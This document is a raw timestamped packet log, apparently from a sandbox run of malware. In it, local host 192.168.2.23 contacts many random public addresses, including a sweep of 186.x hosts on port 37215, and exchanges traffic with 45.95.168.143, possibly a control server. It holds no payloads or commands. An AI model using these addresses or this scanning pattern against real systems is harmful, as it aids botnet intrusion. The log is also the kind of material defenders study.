                                              Dec 13, 2024 01:14:28.524885893 CET655005501192.168.2.23155.204.51.235
                                              Dec 13, 2024 01:14:28.524903059 CET655005501192.168.2.2340.157.112.32
                                              Dec 13, 2024 01:14:28.524903059 CET655005501192.168.2.2380.200.60.91
                                              Dec 13, 2024 01:14:28.524912119 CET655005501192.168.2.2339.12.147.158
                                              Dec 13, 2024 01:14:28.524926901 CET655005501192.168.2.2327.33.228.249
                                              Dec 13, 2024 01:14:28.524929047 CET655005501192.168.2.23186.161.45.203
                                              Dec 13, 2024 01:14:28.524933100 CET655005501192.168.2.23170.44.252.86
                                              Dec 13, 2024 01:14:28.524949074 CET655005501192.168.2.2368.108.202.124
                                              Dec 13, 2024 01:14:28.524952888 CET655005501192.168.2.2363.167.74.21
                                              Dec 13, 2024 01:14:28.524955988 CET655005501192.168.2.23162.26.229.232
                                              Dec 13, 2024 01:14:28.524957895 CET655005501192.168.2.2385.96.238.40
                                              Dec 13, 2024 01:14:28.524964094 CET655005501192.168.2.23113.36.200.186
                                              Dec 13, 2024 01:14:28.524965048 CET655005501192.168.2.23187.123.225.66
                                              Dec 13, 2024 01:14:28.524966955 CET655005501192.168.2.2363.145.248.42
                                              Dec 13, 2024 01:14:28.524972916 CET655005501192.168.2.23191.104.137.213
                                              Dec 13, 2024 01:14:28.524981976 CET655005501192.168.2.23219.62.128.195
                                              Dec 13, 2024 01:14:28.524988890 CET655005501192.168.2.23205.3.62.183
                                              Dec 13, 2024 01:14:28.524998903 CET655005501192.168.2.23198.85.101.14
                                              Dec 13, 2024 01:14:28.525001049 CET655005501192.168.2.2324.105.131.64
                                              Dec 13, 2024 01:14:28.525027990 CET655005501192.168.2.2353.196.124.135
                                              Dec 13, 2024 01:14:28.525027990 CET655005501192.168.2.23162.46.254.66
                                              Dec 13, 2024 01:14:28.525043964 CET655005501192.168.2.23133.153.209.33
                                              Dec 13, 2024 01:14:28.525073051 CET655005501192.168.2.23172.213.83.212
                                              Dec 13, 2024 01:14:28.525077105 CET655005501192.168.2.23213.173.196.90
                                              Dec 13, 2024 01:14:28.525082111 CET655005501192.168.2.23217.172.179.88
                                              Dec 13, 2024 01:14:28.525084972 CET655005501192.168.2.23187.7.255.69
                                              Dec 13, 2024 01:14:28.525087118 CET655005501192.168.2.2377.143.184.176
                                              Dec 13, 2024 01:14:28.525095940 CET655005501192.168.2.23222.41.58.39
                                              Dec 13, 2024 01:14:28.525100946 CET655005501192.168.2.23211.74.230.98
                                              Dec 13, 2024 01:14:28.525105953 CET655005501192.168.2.2351.172.64.103
                                              Dec 13, 2024 01:14:28.525135994 CET655005501192.168.2.23110.149.77.162
                                              Dec 13, 2024 01:14:28.525135994 CET655005501192.168.2.23109.152.217.241
                                              Dec 13, 2024 01:14:28.525136948 CET655005501192.168.2.2320.67.161.85
                                              Dec 13, 2024 01:14:28.525146961 CET655005501192.168.2.2337.180.224.230
                                              Dec 13, 2024 01:14:28.525146961 CET655005501192.168.2.2388.49.196.228
                                              Dec 13, 2024 01:14:28.525147915 CET655005501192.168.2.2377.103.158.125
                                              Dec 13, 2024 01:14:28.525156975 CET655005501192.168.2.23138.61.41.195
                                              Dec 13, 2024 01:14:28.525158882 CET655005501192.168.2.23171.221.13.54
                                              Dec 13, 2024 01:14:28.525162935 CET655005501192.168.2.2346.201.52.91
                                              Dec 13, 2024 01:14:28.525176048 CET655005501192.168.2.2375.76.210.128
                                              Dec 13, 2024 01:14:28.525180101 CET655005501192.168.2.2388.79.219.27
                                              Dec 13, 2024 01:14:28.525188923 CET655005501192.168.2.2379.88.46.236
                                              Dec 13, 2024 01:14:28.525194883 CET655005501192.168.2.2320.131.238.16
                                              Dec 13, 2024 01:14:28.525194883 CET655005501192.168.2.23112.37.151.23
                                              Dec 13, 2024 01:14:28.525198936 CET655005501192.168.2.23163.50.238.208
                                              Dec 13, 2024 01:14:28.525207996 CET655005501192.168.2.23162.157.121.216
                                              Dec 13, 2024 01:14:28.525216103 CET655005501192.168.2.23205.122.16.0
                                              Dec 13, 2024 01:14:28.525228024 CET655005501192.168.2.23105.182.138.170
                                              Dec 13, 2024 01:14:28.525250912 CET655005501192.168.2.2369.148.183.228
                                              Dec 13, 2024 01:14:28.525250912 CET655005501192.168.2.23178.173.105.140
                                              Dec 13, 2024 01:14:28.525253057 CET655005501192.168.2.23115.138.197.41
                                              Dec 13, 2024 01:14:28.525253057 CET655005501192.168.2.23153.13.134.53
                                              Dec 13, 2024 01:14:28.525257111 CET655005501192.168.2.2324.169.78.221
                                              Dec 13, 2024 01:14:28.525264025 CET655005501192.168.2.23216.203.206.220
                                              Dec 13, 2024 01:14:28.525270939 CET655005501192.168.2.23201.63.123.232
                                              Dec 13, 2024 01:14:28.525275946 CET655005501192.168.2.23149.25.1.51
                                              Dec 13, 2024 01:14:28.525275946 CET655005501192.168.2.23197.144.248.193
                                              Dec 13, 2024 01:14:28.525275946 CET655005501192.168.2.23143.42.5.79
                                              Dec 13, 2024 01:14:28.525285006 CET655005501192.168.2.23116.40.227.208
                                              Dec 13, 2024 01:14:28.525285006 CET655005501192.168.2.2379.206.209.238
                                              Dec 13, 2024 01:14:28.525286913 CET655005501192.168.2.23181.42.90.47
                                              Dec 13, 2024 01:14:28.525288105 CET655005501192.168.2.2379.35.95.11
                                              Dec 13, 2024 01:14:28.525288105 CET655005501192.168.2.23117.82.151.252
                                              Dec 13, 2024 01:14:28.525295019 CET655005501192.168.2.2363.95.25.76
                                              Dec 13, 2024 01:14:28.525304079 CET655005501192.168.2.23161.233.194.10
                                              Dec 13, 2024 01:14:28.525305986 CET655005501192.168.2.2365.145.147.96
                                              Dec 13, 2024 01:14:28.525319099 CET655005501192.168.2.23131.89.234.33
                                              Dec 13, 2024 01:14:28.525333881 CET655005501192.168.2.23135.172.136.149
                                              Dec 13, 2024 01:14:28.525333881 CET655005501192.168.2.23218.213.102.69
                                              Dec 13, 2024 01:14:28.525333881 CET655005501192.168.2.2337.209.128.203
                                              Dec 13, 2024 01:14:28.525336027 CET655005501192.168.2.23132.150.21.237
                                              Dec 13, 2024 01:14:28.525340080 CET655005501192.168.2.2378.110.49.176
                                              Dec 13, 2024 01:14:28.525346994 CET655005501192.168.2.2336.91.41.204
                                              Dec 13, 2024 01:14:28.525362015 CET655005501192.168.2.2381.182.244.92
                                              Dec 13, 2024 01:14:28.525362015 CET655005501192.168.2.23120.36.97.29
                                              Dec 13, 2024 01:14:28.525368929 CET655005501192.168.2.23150.136.109.228
                                              Dec 13, 2024 01:14:28.525372028 CET655005501192.168.2.231.75.232.214
                                              Dec 13, 2024 01:14:28.525381088 CET655005501192.168.2.2395.232.139.212
                                              Dec 13, 2024 01:14:28.525398016 CET655005501192.168.2.2391.28.151.157
                                              Dec 13, 2024 01:14:28.525399923 CET655005501192.168.2.2395.158.120.250
                                              Dec 13, 2024 01:14:28.525399923 CET655005501192.168.2.2365.77.56.126
                                              Dec 13, 2024 01:14:28.525399923 CET655005501192.168.2.23136.89.122.102
                                              Dec 13, 2024 01:14:28.525415897 CET655005501192.168.2.2324.28.90.151
                                              Dec 13, 2024 01:14:28.525422096 CET655005501192.168.2.2373.26.11.220
                                              Dec 13, 2024 01:14:28.525424004 CET655005501192.168.2.23174.53.119.39
                                              Dec 13, 2024 01:14:28.525432110 CET655005501192.168.2.2360.170.117.124
                                              Dec 13, 2024 01:14:28.525435925 CET655005501192.168.2.2319.229.106.106
                                              Dec 13, 2024 01:14:28.525446892 CET655005501192.168.2.2368.35.83.2
                                              Dec 13, 2024 01:14:28.525454044 CET655005501192.168.2.2359.88.23.247
                                              Dec 13, 2024 01:14:28.525460958 CET655005501192.168.2.239.181.18.51
                                              Dec 13, 2024 01:14:28.525463104 CET655005501192.168.2.2317.127.7.200
                                              Dec 13, 2024 01:14:28.525473118 CET655005501192.168.2.23160.195.208.124
                                              Dec 13, 2024 01:14:28.525490046 CET655005501192.168.2.23165.128.77.71
                                              Dec 13, 2024 01:14:28.525492907 CET655005501192.168.2.23222.133.217.10
                                              Dec 13, 2024 01:14:28.525510073 CET655005501192.168.2.2344.207.108.212
                                              Dec 13, 2024 01:14:28.525510073 CET655005501192.168.2.23162.66.215.150
                                              Dec 13, 2024 01:14:28.525521994 CET655005501192.168.2.2377.25.65.232
                                              Dec 13, 2024 01:14:28.525528908 CET655005501192.168.2.23217.235.171.220
                                              Dec 13, 2024 01:14:28.525532007 CET655005501192.168.2.2352.162.211.103
                                              Dec 13, 2024 01:14:28.525544882 CET655005501192.168.2.23112.219.98.50
                                              Dec 13, 2024 01:14:28.525544882 CET655005501192.168.2.23211.62.54.10
                                              Dec 13, 2024 01:14:28.525559902 CET655005501192.168.2.23107.61.73.12
                                              Dec 13, 2024 01:14:28.525572062 CET655005501192.168.2.23158.129.41.76
                                              Dec 13, 2024 01:14:28.525577068 CET655005501192.168.2.2398.189.170.252
                                              Dec 13, 2024 01:14:28.525577068 CET655005501192.168.2.2370.66.202.253
                                              Dec 13, 2024 01:14:28.525579929 CET655005501192.168.2.2379.118.133.94
                                              Dec 13, 2024 01:14:28.525595903 CET655005501192.168.2.23164.72.0.176
                                              Dec 13, 2024 01:14:28.525608063 CET655005501192.168.2.2363.102.129.120
                                              Dec 13, 2024 01:14:28.525608063 CET655005501192.168.2.23211.93.153.82
                                              Dec 13, 2024 01:14:28.525614023 CET655005501192.168.2.2362.42.120.54
                                              Dec 13, 2024 01:14:28.525628090 CET655005501192.168.2.23181.120.10.61
                                              Dec 13, 2024 01:14:28.525629044 CET655005501192.168.2.23157.14.147.87
                                              Dec 13, 2024 01:14:28.525630951 CET655005501192.168.2.23178.51.172.178
                                              Dec 13, 2024 01:14:28.525638103 CET655005501192.168.2.2341.68.77.178
                                              Dec 13, 2024 01:14:28.630203962 CET342414676245.95.168.143192.168.2.23
                                              Dec 13, 2024 01:14:28.630259037 CET4676234241192.168.2.2345.95.168.143
                                              Dec 13, 2024 01:14:28.631349087 CET3721565244186.19.125.38192.168.2.23
                                              Dec 13, 2024 01:14:28.631408930 CET3721565244186.172.193.38192.168.2.23
                                              Dec 13, 2024 01:14:28.631437063 CET6524437215192.168.2.23186.19.125.38
                                              Dec 13, 2024 01:14:28.631460905 CET3721565244186.76.46.114192.168.2.23
                                              Dec 13, 2024 01:14:28.631494045 CET3721565244186.116.75.25192.168.2.23
                                              Dec 13, 2024 01:14:28.631546021 CET3721565244186.51.253.131192.168.2.23
                                              Dec 13, 2024 01:14:28.631551027 CET6524437215192.168.2.23186.172.193.38
                                              Dec 13, 2024 01:14:28.631576061 CET3721565244186.64.147.242192.168.2.23
                                              Dec 13, 2024 01:14:28.631577015 CET6524437215192.168.2.23186.76.46.114
                                              Dec 13, 2024 01:14:28.631577015 CET6524437215192.168.2.23186.116.75.25
                                              Dec 13, 2024 01:14:28.631594896 CET6524437215192.168.2.23186.51.253.131
                                              Dec 13, 2024 01:14:28.631623983 CET6524437215192.168.2.23186.64.147.242
                                              Dec 13, 2024 01:14:28.631774902 CET3721565244186.68.124.152192.168.2.23
                                              Dec 13, 2024 01:14:28.631805897 CET3721565244186.151.208.186192.168.2.23
                                              Dec 13, 2024 01:14:28.631834030 CET6524437215192.168.2.23186.68.124.152
                                              Dec 13, 2024 01:14:28.631835938 CET3721565244186.100.204.184192.168.2.23
                                              Dec 13, 2024 01:14:28.631844997 CET6524437215192.168.2.23186.151.208.186
                                              Dec 13, 2024 01:14:28.631880999 CET6524437215192.168.2.23186.100.204.184
                                              Dec 13, 2024 01:14:28.631886005 CET3721565244186.16.201.57192.168.2.23
                                              Dec 13, 2024 01:14:28.631915092 CET3721565244186.250.37.101192.168.2.23
                                              Dec 13, 2024 01:14:28.631926060 CET6524437215192.168.2.23186.16.201.57
                                              Dec 13, 2024 01:14:28.631944895 CET3721565244186.209.236.173192.168.2.23
                                              Dec 13, 2024 01:14:28.631962061 CET6524437215192.168.2.23186.250.37.101
                                              Dec 13, 2024 01:14:28.631972075 CET3721565244186.148.129.239192.168.2.23
                                              Dec 13, 2024 01:14:28.631987095 CET6524437215192.168.2.23186.209.236.173
                                              Dec 13, 2024 01:14:28.631999969 CET3721565244186.239.241.54192.168.2.23
                                              Dec 13, 2024 01:14:28.632019043 CET6524437215192.168.2.23186.148.129.239
                                              Dec 13, 2024 01:14:28.632045984 CET6524437215192.168.2.23186.239.241.54
                                              Dec 13, 2024 01:14:28.632155895 CET3721565244186.116.36.164192.168.2.23
                                              Dec 13, 2024 01:14:28.632201910 CET6524437215192.168.2.23186.116.36.164
                                              Dec 13, 2024 01:14:28.632205963 CET3721565244186.212.169.127192.168.2.23
                                              Dec 13, 2024 01:14:28.632234097 CET3721565244186.23.177.218192.168.2.23
                                              Dec 13, 2024 01:14:28.632250071 CET6524437215192.168.2.23186.212.169.127
                                              Dec 13, 2024 01:14:28.632262945 CET3721565244186.110.138.199192.168.2.23
                                              Dec 13, 2024 01:14:28.632272005 CET6524437215192.168.2.23186.23.177.218
                                              Dec 13, 2024 01:14:28.632297993 CET3721565244186.126.79.96192.168.2.23
                                              Dec 13, 2024 01:14:28.632327080 CET3721565244186.154.24.140192.168.2.23
                                              Dec 13, 2024 01:14:28.632333994 CET6524437215192.168.2.23186.110.138.199
                                              Dec 13, 2024 01:14:28.632333994 CET6524437215192.168.2.23186.126.79.96
                                              Dec 13, 2024 01:14:28.632334948 CET4676234241192.168.2.2345.95.168.143
                                              Dec 13, 2024 01:14:28.632355928 CET3721565244186.177.11.22192.168.2.23
                                              Dec 13, 2024 01:14:28.632371902 CET6524437215192.168.2.23186.154.24.140
                                              Dec 13, 2024 01:14:28.632383108 CET3721565244186.214.126.198192.168.2.23
                                              Dec 13, 2024 01:14:28.632404089 CET6524437215192.168.2.23186.177.11.22
                                              Dec 13, 2024 01:14:28.632411957 CET3721565244186.214.97.207192.168.2.23
                                              Dec 13, 2024 01:14:28.632436991 CET6524437215192.168.2.23186.214.126.198
                                              Dec 13, 2024 01:14:28.632440090 CET3721565244186.14.241.163192.168.2.23
                                              Dec 13, 2024 01:14:28.632462025 CET6524437215192.168.2.23186.214.97.207
                                              Dec 13, 2024 01:14:28.632468939 CET3721565244186.206.34.171192.168.2.23
                                              Dec 13, 2024 01:14:28.632483006 CET6524437215192.168.2.23186.14.241.163
                                              Dec 13, 2024 01:14:28.632498026 CET3721565244186.209.201.112192.168.2.23
                                              Dec 13, 2024 01:14:28.632512093 CET6524437215192.168.2.23186.206.34.171
                                              Dec 13, 2024 01:14:28.632527113 CET3721565244186.40.12.25192.168.2.23
                                              Dec 13, 2024 01:14:28.632539988 CET6524437215192.168.2.23186.209.201.112
                                              Dec 13, 2024 01:14:28.632555008 CET3721565244186.56.186.99192.168.2.23
                                              Dec 13, 2024 01:14:28.632572889 CET6524437215192.168.2.23186.40.12.25
                                              Dec 13, 2024 01:14:28.632582903 CET3721565244186.138.22.178192.168.2.23
                                              Dec 13, 2024 01:14:28.632596970 CET6524437215192.168.2.23186.56.186.99
                                              Dec 13, 2024 01:14:28.632615089 CET3721565244186.199.176.68192.168.2.23
                                              Dec 13, 2024 01:14:28.632630110 CET6524437215192.168.2.23186.138.22.178
                                              Dec 13, 2024 01:14:28.632648945 CET3721565244186.18.52.147192.168.2.23
                                              Dec 13, 2024 01:14:28.632668972 CET6524437215192.168.2.23186.199.176.68
                                              Dec 13, 2024 01:14:28.632678032 CET3721565244186.247.235.75192.168.2.23
                                              Dec 13, 2024 01:14:28.632694006 CET6524437215192.168.2.23186.18.52.147
                                              Dec 13, 2024 01:14:28.632705927 CET3721565244186.174.90.91192.168.2.23
                                              Dec 13, 2024 01:14:28.632709026 CET6524437215192.168.2.23186.247.235.75
                                              Dec 13, 2024 01:14:28.632735968 CET3721565244186.251.247.245192.168.2.23
                                              Dec 13, 2024 01:14:28.632747889 CET6524437215192.168.2.23186.174.90.91
                                              Dec 13, 2024 01:14:28.632776976 CET3721565244186.115.54.95192.168.2.23
                                              Dec 13, 2024 01:14:28.632781982 CET6524437215192.168.2.23186.251.247.245
                                              Dec 13, 2024 01:14:28.632806063 CET3721565244186.83.158.107192.168.2.23
                                              Dec 13, 2024 01:14:28.632831097 CET6524437215192.168.2.23186.115.54.95
                                              Dec 13, 2024 01:14:28.632833958 CET3721565244186.87.100.227192.168.2.23
                                              Dec 13, 2024 01:14:28.632847071 CET6524437215192.168.2.23186.83.158.107
                                              Dec 13, 2024 01:14:28.632875919 CET3721565244186.72.163.148192.168.2.23
                                              Dec 13, 2024 01:14:28.632879972 CET6524437215192.168.2.23186.87.100.227
                                              Dec 13, 2024 01:14:28.632905006 CET3721565244186.130.191.97192.168.2.23
                                              Dec 13, 2024 01:14:28.632917881 CET6524437215192.168.2.23186.72.163.148
                                              Dec 13, 2024 01:14:28.632934093 CET3721565244186.67.100.18192.168.2.23
                                              Dec 13, 2024 01:14:28.632951975 CET6524437215192.168.2.23186.130.191.97
                                              Dec 13, 2024 01:14:28.632962942 CET3721565244186.11.110.1192.168.2.23
                                              Dec 13, 2024 01:14:28.632975101 CET6524437215192.168.2.23186.67.100.18
                                              Dec 13, 2024 01:14:28.633008957 CET6524437215192.168.2.23186.11.110.1
                                              Dec 13, 2024 01:14:28.633016109 CET3721565244186.82.230.250192.168.2.23
                                              Dec 13, 2024 01:14:28.633045912 CET3721565244186.200.40.215192.168.2.23
                                              Dec 13, 2024 01:14:28.633063078 CET6524437215192.168.2.23186.82.230.250
                                              Dec 13, 2024 01:14:28.633076906 CET3721565244186.9.133.190192.168.2.23
                                              Dec 13, 2024 01:14:28.633091927 CET6524437215192.168.2.23186.200.40.215
                                              Dec 13, 2024 01:14:28.633104086 CET3721565244186.3.132.247192.168.2.23
                                              Dec 13, 2024 01:14:28.633119106 CET6524437215192.168.2.23186.9.133.190
                                              Dec 13, 2024 01:14:28.633131027 CET3721565244186.65.87.241192.168.2.23
                                              Dec 13, 2024 01:14:28.633147955 CET6524437215192.168.2.23186.3.132.247
                                              Dec 13, 2024 01:14:28.633164883 CET6524437215192.168.2.23186.65.87.241
                                              Dec 13, 2024 01:14:28.633182049 CET3721565244186.113.18.129192.168.2.23
                                              Dec 13, 2024 01:14:28.633210897 CET3721565244186.252.6.208192.168.2.23
                                              Dec 13, 2024 01:14:28.633224964 CET6524437215192.168.2.23186.113.18.129
                                              Dec 13, 2024 01:14:28.633239031 CET3721565244186.237.104.105192.168.2.23
                                              Dec 13, 2024 01:14:28.633260965 CET6524437215192.168.2.23186.252.6.208
                                              Dec 13, 2024 01:14:28.633265972 CET3721565244186.177.190.183192.168.2.23
                                              Dec 13, 2024 01:14:28.633272886 CET6524437215192.168.2.23186.237.104.105
                                              Dec 13, 2024 01:14:28.633299112 CET3721565244186.154.67.226192.168.2.23
                                              Dec 13, 2024 01:14:28.633305073 CET3721565244186.74.170.6192.168.2.23
                                              Dec 13, 2024 01:14:28.633308887 CET6524437215192.168.2.23186.177.190.183
                                              Dec 13, 2024 01:14:28.633333921 CET3721565244186.23.62.111192.168.2.23
                                              Dec 13, 2024 01:14:28.633337975 CET6524437215192.168.2.23186.154.67.226
                                              Dec 13, 2024 01:14:28.633346081 CET6524437215192.168.2.23186.74.170.6
                                              Dec 13, 2024 01:14:28.633362055 CET3721565244186.238.85.180192.168.2.23
                                              Dec 13, 2024 01:14:28.633377075 CET6524437215192.168.2.23186.23.62.111
                                              Dec 13, 2024 01:14:28.633389950 CET3721565244186.199.51.33192.168.2.23
                                              Dec 13, 2024 01:14:28.633404016 CET6524437215192.168.2.23186.238.85.180
                                              Dec 13, 2024 01:14:28.633419037 CET3721565244186.32.94.40192.168.2.23
                                              Dec 13, 2024 01:14:28.633430958 CET6524437215192.168.2.23186.199.51.33
                                              Dec 13, 2024 01:14:28.633446932 CET3721565244186.21.162.106192.168.2.23
                                              Dec 13, 2024 01:14:28.633455992 CET6524437215192.168.2.23186.32.94.40
                                              Dec 13, 2024 01:14:28.633475065 CET3721565244186.190.157.165192.168.2.23
                                              Dec 13, 2024 01:14:28.633482933 CET6524437215192.168.2.23186.21.162.106
                                              Dec 13, 2024 01:14:28.633503914 CET3721565244186.121.67.142192.168.2.23
                                              Dec 13, 2024 01:14:28.633516073 CET6524437215192.168.2.23186.190.157.165
                                              Dec 13, 2024 01:14:28.633546114 CET3721565244186.54.107.85192.168.2.23
                                              Dec 13, 2024 01:14:28.633547068 CET6524437215192.168.2.23186.121.67.142
                                              Dec 13, 2024 01:14:28.633574009 CET3721565244186.193.109.176192.168.2.23
                                              Dec 13, 2024 01:14:28.633582115 CET6524437215192.168.2.23186.54.107.85
                                              Dec 13, 2024 01:14:28.633604050 CET3721565244186.43.174.252192.168.2.23
                                              Dec 13, 2024 01:14:28.633616924 CET6524437215192.168.2.23186.193.109.176
                                              Dec 13, 2024 01:14:28.633644104 CET3721565244186.206.164.138192.168.2.23
                                              Dec 13, 2024 01:14:28.633645058 CET6524437215192.168.2.23186.43.174.252
                                              Dec 13, 2024 01:14:28.633687973 CET6524437215192.168.2.23186.206.164.138
                                              Dec 13, 2024 01:14:28.633698940 CET3721565244186.132.89.1192.168.2.23
                                              Dec 13, 2024 01:14:28.633728027 CET3721565244186.223.147.59192.168.2.23
                                              Dec 13, 2024 01:14:28.633738041 CET6524437215192.168.2.23186.132.89.1
                                              Dec 13, 2024 01:14:28.633764029 CET6524437215192.168.2.23186.223.147.59
                                              Dec 13, 2024 01:14:28.633765936 CET3721565244186.123.222.117192.168.2.23
                                              Dec 13, 2024 01:14:28.633795023 CET3721565244186.247.11.37192.168.2.23
                                              Dec 13, 2024 01:14:28.633810043 CET6524437215192.168.2.23186.123.222.117
                                              Dec 13, 2024 01:14:28.633824110 CET3721565244186.153.65.126192.168.2.23
                                              Dec 13, 2024 01:14:28.633836031 CET6524437215192.168.2.23186.247.11.37
                                              Dec 13, 2024 01:14:28.633852005 CET3721565244186.243.249.165192.168.2.23
                                              Dec 13, 2024 01:14:28.633867979 CET6524437215192.168.2.23186.153.65.126
                                              Dec 13, 2024 01:14:28.633879900 CET3721565244186.35.175.7192.168.2.23
                                              Dec 13, 2024 01:14:28.633898973 CET6524437215192.168.2.23186.243.249.165
                                              Dec 13, 2024 01:14:28.633908987 CET3721565244186.208.174.41192.168.2.23
                                              Dec 13, 2024 01:14:28.633923054 CET6524437215192.168.2.23186.35.175.7
                                              Dec 13, 2024 01:14:28.633946896 CET6524437215192.168.2.23186.208.174.41
                                              Dec 13, 2024 01:14:28.633970022 CET3721565244186.114.206.183192.168.2.23
                                              Dec 13, 2024 01:14:28.633999109 CET3721565244186.28.103.159192.168.2.23
                                              Dec 13, 2024 01:14:28.634012938 CET6524437215192.168.2.23186.114.206.183
                                              Dec 13, 2024 01:14:28.634032011 CET3721565244186.39.244.188192.168.2.23
                                              Dec 13, 2024 01:14:28.634038925 CET3721565244186.54.99.66192.168.2.23
                                              Dec 13, 2024 01:14:28.634040117 CET6524437215192.168.2.23186.28.103.159
                                              Dec 13, 2024 01:14:28.634052038 CET3721565244186.72.183.114192.168.2.23
                                              Dec 13, 2024 01:14:28.634071112 CET6524437215192.168.2.23186.54.99.66
                                              Dec 13, 2024 01:14:28.634079933 CET3721565244186.67.73.255192.168.2.23
                                              Dec 13, 2024 01:14:28.634094000 CET6524437215192.168.2.23186.39.244.188
                                              Dec 13, 2024 01:14:28.634097099 CET6524437215192.168.2.23186.72.183.114
                                              Dec 13, 2024 01:14:28.634108067 CET3721565244186.59.60.71192.168.2.23
                                              Dec 13, 2024 01:14:28.634123087 CET6524437215192.168.2.23186.67.73.255
                                              Dec 13, 2024 01:14:28.634135962 CET3721565244186.187.229.74192.168.2.23
                                              Dec 13, 2024 01:14:28.634150028 CET6524437215192.168.2.23186.59.60.71
                                              Dec 13, 2024 01:14:28.634162903 CET3721565244186.3.26.113192.168.2.23
                                              Dec 13, 2024 01:14:28.634176016 CET3721565244186.149.198.240192.168.2.23
                                              Dec 13, 2024 01:14:28.634176016 CET6524437215192.168.2.23186.187.229.74
                                              Dec 13, 2024 01:14:28.634202957 CET6524437215192.168.2.23186.3.26.113
                                              Dec 13, 2024 01:14:28.634202957 CET3721565244186.142.154.112192.168.2.23
                                              Dec 13, 2024 01:14:28.634218931 CET6524437215192.168.2.23186.149.198.240
                                              Dec 13, 2024 01:14:28.634232044 CET3721565244186.185.17.214192.168.2.23
                                              Dec 13, 2024 01:14:28.634237051 CET6524437215192.168.2.23186.142.154.112
                                              Dec 13, 2024 01:14:28.634264946 CET3721565244186.200.146.92192.168.2.23
                                              Dec 13, 2024 01:14:28.634277105 CET6524437215192.168.2.23186.185.17.214
                                              Dec 13, 2024 01:14:28.634294033 CET3721565244186.116.229.231192.168.2.23
                                              Dec 13, 2024 01:14:28.634315968 CET6524437215192.168.2.23186.200.146.92
                                              Dec 13, 2024 01:14:28.634321928 CET3721565244186.33.160.39192.168.2.23
                                              Dec 13, 2024 01:14:28.634347916 CET6524437215192.168.2.23186.116.229.231
                                              Dec 13, 2024 01:14:28.634351015 CET3721565244186.255.147.69192.168.2.23
                                              Dec 13, 2024 01:14:28.634358883 CET6524437215192.168.2.23186.33.160.39
                                              Dec 13, 2024 01:14:28.634378910 CET3721565244186.5.186.108192.168.2.23
                                              Dec 13, 2024 01:14:28.634394884 CET6524437215192.168.2.23186.255.147.69
                                              Dec 13, 2024 01:14:28.634418964 CET3721565244186.62.52.202192.168.2.23
                                              Dec 13, 2024 01:14:28.634423971 CET6524437215192.168.2.23186.5.186.108
                                              Dec 13, 2024 01:14:28.634447098 CET3721565244186.25.171.151192.168.2.23
                                              Dec 13, 2024 01:14:28.634464025 CET6524437215192.168.2.23186.62.52.202
                                              Dec 13, 2024 01:14:28.634480000 CET6524437215192.168.2.23186.25.171.151
                                              Dec 13, 2024 01:14:28.634546995 CET3721565244186.223.251.232192.168.2.23
                                              Dec 13, 2024 01:14:28.634593964 CET6524437215192.168.2.23186.223.251.232
                                              Dec 13, 2024 01:14:28.634610891 CET3721565244186.86.142.46192.168.2.23
                                              Dec 13, 2024 01:14:28.634653091 CET3721565244186.231.231.56192.168.2.23
                                              Dec 13, 2024 01:14:28.634654045 CET6524437215192.168.2.23186.86.142.46
                                              Dec 13, 2024 01:14:28.634694099 CET6524437215192.168.2.23186.231.231.56
                                              Dec 13, 2024 01:14:28.634706020 CET3721565244186.247.22.137192.168.2.23
                                              Dec 13, 2024 01:14:28.634747028 CET3721565244186.214.83.11192.168.2.23
                                              Dec 13, 2024 01:14:28.634752989 CET6524437215192.168.2.23186.247.22.137
                                              Dec 13, 2024 01:14:28.634795904 CET6524437215192.168.2.23186.214.83.11
                                              Dec 13, 2024 01:14:28.634809017 CET3721565244186.166.169.125192.168.2.23
                                              Dec 13, 2024 01:14:28.634850979 CET3721565244186.60.252.177192.168.2.23
                                              Dec 13, 2024 01:14:28.634854078 CET6524437215192.168.2.23186.166.169.125
                                              Dec 13, 2024 01:14:28.634879112 CET3721565244186.233.156.4192.168.2.23
                                              Dec 13, 2024 01:14:28.634907007 CET3721565244186.1.132.51192.168.2.23
                                              Dec 13, 2024 01:14:28.634907961 CET6524437215192.168.2.23186.60.252.177
                                              Dec 13, 2024 01:14:28.634928942 CET6524437215192.168.2.23186.233.156.4
                                              Dec 13, 2024 01:14:28.634948015 CET6524437215192.168.2.23186.1.132.51
                                              Dec 13, 2024 01:14:28.634974003 CET3721565244186.107.29.106192.168.2.23
                                              Dec 13, 2024 01:14:28.635004044 CET3721565244186.109.130.115192.168.2.23
                                              Dec 13, 2024 01:14:28.635015965 CET6524437215192.168.2.23186.107.29.106
                                              Dec 13, 2024 01:14:28.635032892 CET3721565244186.74.137.8192.168.2.23
                                              Dec 13, 2024 01:14:28.635054111 CET6524437215192.168.2.23186.109.130.115
                                              Dec 13, 2024 01:14:28.635061026 CET3721565244186.104.177.210192.168.2.23
                                              Dec 13, 2024 01:14:28.635076046 CET6524437215192.168.2.23186.74.137.8
                                              Dec 13, 2024 01:14:28.635090113 CET3721565244186.70.239.81192.168.2.23
                                              Dec 13, 2024 01:14:28.635103941 CET6524437215192.168.2.23186.104.177.210
                                              Dec 13, 2024 01:14:28.635118008 CET3721565244186.167.152.75192.168.2.23
                                              Dec 13, 2024 01:14:28.635129929 CET6524437215192.168.2.23186.70.239.81
                                              Dec 13, 2024 01:14:28.635144949 CET3721565244186.34.20.229192.168.2.23
                                              Dec 13, 2024 01:14:28.635155916 CET6524437215192.168.2.23186.167.152.75
                                              Dec 13, 2024 01:14:28.635174036 CET3721565244186.165.248.247192.168.2.23
                                              Dec 13, 2024 01:14:28.635191917 CET6524437215192.168.2.23186.34.20.229
                                              Dec 13, 2024 01:14:28.635201931 CET3721565244186.10.135.110192.168.2.23
                                              Dec 13, 2024 01:14:28.635217905 CET6524437215192.168.2.23186.165.248.247
                                              Dec 13, 2024 01:14:28.635230064 CET3721565244186.166.19.175192.168.2.23
                                              Dec 13, 2024 01:14:28.635242939 CET6524437215192.168.2.23186.10.135.110
                                              Dec 13, 2024 01:14:28.635257959 CET3721565244186.12.13.234192.168.2.23
                                              Dec 13, 2024 01:14:28.635267019 CET6524437215192.168.2.23186.166.19.175
                                              Dec 13, 2024 01:14:28.635286093 CET3721565244186.102.126.207192.168.2.23
                                              Dec 13, 2024 01:14:28.635303974 CET6524437215192.168.2.23186.12.13.234
                                              Dec 13, 2024 01:14:28.635332108 CET6524437215192.168.2.23186.102.126.207
                                              Dec 13, 2024 01:14:28.635332108 CET3721565244186.131.179.174192.168.2.23
                                              Dec 13, 2024 01:14:28.635361910 CET3721565244186.171.140.43192.168.2.23
                                              Dec 13, 2024 01:14:28.635365009 CET6524437215192.168.2.23186.131.179.174
                                              Dec 13, 2024 01:14:28.635390043 CET3721565244186.32.126.215192.168.2.23
